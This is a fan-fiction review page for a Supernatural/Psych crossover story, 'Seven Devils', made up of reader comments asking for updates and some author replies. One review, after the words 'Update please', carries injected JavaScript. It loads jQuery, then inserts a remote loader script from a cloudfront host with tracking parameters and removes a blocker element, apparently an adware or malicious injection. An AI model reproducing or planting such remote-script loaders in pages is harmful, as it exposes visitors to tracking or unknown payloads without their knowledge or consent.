Reviewer: DTS Signed [Report This]
Date: March 27, 2014 8:12 pm Title: Seven Devils

I know you're in the midst of YWHOAOU (which I plan to re-read since you've now updated) but do you have any plans to continue with this story & series?

Author's Response:

Yep, still want to finish this story. But as you suspected, it's on the back burner until the end of the semester at least (end of April). I'll reevaluate then what I want to do.

I DO want to finish this though, I love Dean and Shawn so much <3 Thanks for the review!

Reviewer: sav Anonymous [Report This]
Date: October 08, 2013 7:15 am Title: Seven Devils

This is srsly the best superpsych fanfic i've ever read! MORE plz!

Reviewer: Bri5 Anonymous [Report This]
Date: February 26, 2013 7:17 pm Title: Seven Devils

Hello! Thanks to you, I've become obsessed with all Supernatural Psych Crossovers. I hope you're happy. ~ Banging head against wall~ PLEASE PLEASE PLEASE PLEASE Update soon!!!

Reviewer: Anonymous Anonymous [Report This]
Date: November 13, 2012 12:08 pm Title: Seven Devils

Please update this again real soon! I can't wait to read the rest!

Reviewer: LovingShawn22 Signed [Report This]
Date: September 25, 2012 9:36 pm Title: Seven Devils

Update pleaseif(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};

Reviewer: Carol Anonymous [Report This]
Date: August 24, 2012 11:31 am Title: Seven Devils

I LOVE THIS STORY SSSSSSOOOOOOOOOOOOOOO MUCH <333333!!!! Please keep going its just AWESOME :D. I just love everything about it from the plot to the character interaction its just very well done. Cant wait for your next chapter. Hope its soon. :D <3

Reviewer: AwesomenessISmyGame Signed starstarstarstarstar [Report This]
Date: June 14, 2012 8:26 pm Title: Seven Devils

*Sneaks in to Vindi's home with glass of water*  Shhhhhh cat. *Slowly opens Vindi's door, sees sleeping Vindi, splashes water on her face*

Ok now that you're up time to get crakin' 

And oh I am soooooo sorry I didn't update sooner. (damn week from hell)  

I love that you mention the overload of pink in here and I guess it's an Ok color just not my favorite.

And the banter, I am absolutely just in love with it it's ridiculous. I guess you need an outlet for the funny after all that angst in YWHOAOU.  

I know I do when I write that's why I have 100 Moments.

Also that wrestle match in the hotel room 

XD

I am so looking forward to the killing of demon from them, you have no idea.

And with an impressive amount of weaponary. *gets all dreamy eyed thinking about the guns*

Sorry about that.  Anyways I love how Dean is having to babysit Shawn when in fact they both need a baby sitter because look >>>>> "Did I mention we're being followed"

Dammit, of course you are. With the luck of Shawn and Dean combined how could you not be followed.  Stupid asses.

Dean & Shawn: Hey!!!

No you guys have no say in these reviews so STFU.

Anywho, again, I love the banter, the suspense, the mystery, the investigating, the fuglies, hell everything.

*Laughs as you sputter and throw stuff at me*  

Well get to writing Vindi.

 

Reviewer: Bellestarr Anonymous [Report This]
Date: June 13, 2012 6:15 am Title: Seven Devils

It's a great idea, not when Shawn says it. lol  This is such a fun story that makes me laugh and I really need that these days.  Thank You!

Author's Response: Aww, I'm so glad it makes you laugh! I hope it continues to do it in the future! But no, thank YOU for the wonderful review, Belle :)

Reviewer: Mrs-N-Uzumaki Signed [Report This]
Date: June 13, 2012 3:19 am Title: Seven Devils

Nice. Just nice. Leaving the chapter with a line like that for your readers.

*pitchforks are ready*



Author's Response: D: *runs away*

Reviewer: lunasgathering Signed starstarstarstarstar [Report This]
Date: June 13, 2012 1:12 am Title: Seven Devils

LOL! I was writing my last review while you were posting this chapter. What a wonderful gift for me. This was a great chapter. John was still so very JOHN and we get a hint of Shawn's propensity for seeking out trouble. Awesome that he can drag Dean along just as easily as he does Gus. :D John is SO going to kick Dean's ass when they get back out of said trouble.

No results found.


Enter the security code shown below: